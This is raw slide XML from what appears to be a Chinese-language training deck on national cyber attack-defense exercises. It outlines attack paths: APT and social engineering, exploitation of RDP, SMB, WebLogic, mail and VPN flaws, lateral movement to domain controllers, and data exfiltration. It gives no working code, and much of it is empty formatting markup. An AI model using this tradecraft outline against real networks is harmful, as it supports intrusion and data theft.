              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>高危漏洞导致某大型电站邮件泄露；某厂商的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>SSL VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>导致某金融机构的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>账号伪造）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pP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全国统一的时间段导致安全从业人员急缺，演练效果参差不齐</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况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8" y="3008186"/>
            <a:ext cx="3703199" cy="31099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77" y="3008186"/>
            <a:ext cx="4758922" cy="3109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攻防演习概况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背景介绍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国内外重大攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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演习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marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="004098"/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marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/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攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/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关键技术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/>
              <a:t>攻击路径及关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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/>
              <a:t>典型攻防案例解析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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 smtClean="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>防护方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>及挑战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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marL="228600" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN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总结</a:t>
            </a:r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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>攻击路径及关键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>最终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>目标一致，无论路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，在规则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>范围内即可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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291"/>
            <a:ext cx="9132863" cy="4497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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>攻击路径及关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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500" dirty="0" smtClean="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>内到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>外：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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2100" dirty="0" smtClean="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>持续性：长期搜集网络用户信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>定点社工：邮件、社交网络等一切可能接近用户的途径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>技术先进：应用软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>0-1day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>漏洞、恶意软件伪装程度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>高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内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>网设备穿透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>内网设备广泛存在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>0-1day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>区别传统植入：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>DNS rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>实现跨域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>最</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>的是对网关路由器的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>攻击路径及关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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500" dirty="0" smtClean="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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通用服务漏洞攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>软件漏洞，正面突破网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>操作系统默认开放服务：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>RDP3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>SMB445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>公开漏洞为主，未公开漏洞价值极高，很少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>出现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="21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通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>框架漏洞攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>CMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>容器存在诸多安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>公开漏洞的补丁绕过导致安全问题层出不穷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pP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网关类设备漏洞攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/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zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>、防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>攻击路径及关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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500" dirty="0" smtClean="0"/>
              <a:t>从内到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>：稳定控制的基础上，渗透拓展（探测、控制、回传）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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主机攻防对抗：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>恶意行为与检测、各种白利用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内网关键节点攻防：域控制器、邮件服务器、文件服务器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty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账户与权限对抗：定位关键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>用户、用户与主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>对应</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pP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回传关键数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>网络拓扑、数据库、邮件、重要文档等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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攻防关键技术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500" dirty="0" smtClean="0"/>
              <a:t>典型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>解析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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从内到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>外：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800" dirty="0"/>
              <a:t>HW2018--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>某大型金融监管机构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多品牌系列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>的漏洞攻击</a:t>
            </a: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从外到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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800" dirty="0" smtClean="0"/>
              <a:t>RDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>服务远程高危漏洞攻击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800" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>反序列化漏洞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800" dirty="0" err="1" smtClean="0"/>
              <a:t>Coremail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>imbra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>邮件系统安全漏洞攻击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/>
              <a:t>国内外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>设备远程高危漏洞攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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 smtClean="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>内到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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典型域环境后渗透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/>
              <a:t>实际渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>测试案例解析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>：从内到外</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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dirty="0" smtClean="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：针对目标网络的用户，进行植入式攻击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持续性：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>前，长期搜集用户敏感信息，各种社工库；攻击后，长期隐藏潜伏，持续窃取数据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定点社工：邮件、社交网络等一切可能接近用户的途径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植入技术先进：应用软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>0-1day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>漏洞、恶意软件伪装程度高</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty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有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>针对性横向拓展：高权限账户、集中管控系统（类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>等）、基础设施（邮件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>\OA\Wiki\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>工单等）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty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对抗性强：样本隐蔽、不落地、消痕等反检测应用普遍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>：从内到外</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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 smtClean="0"/>
              <a:t>内网设备穿透：利用内网设备漏洞，穿透攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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内网设备广泛存在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>0-1day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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路由器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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打印机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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智能家居</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pP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区别传统植入：通过</a:t>
            </a:r>
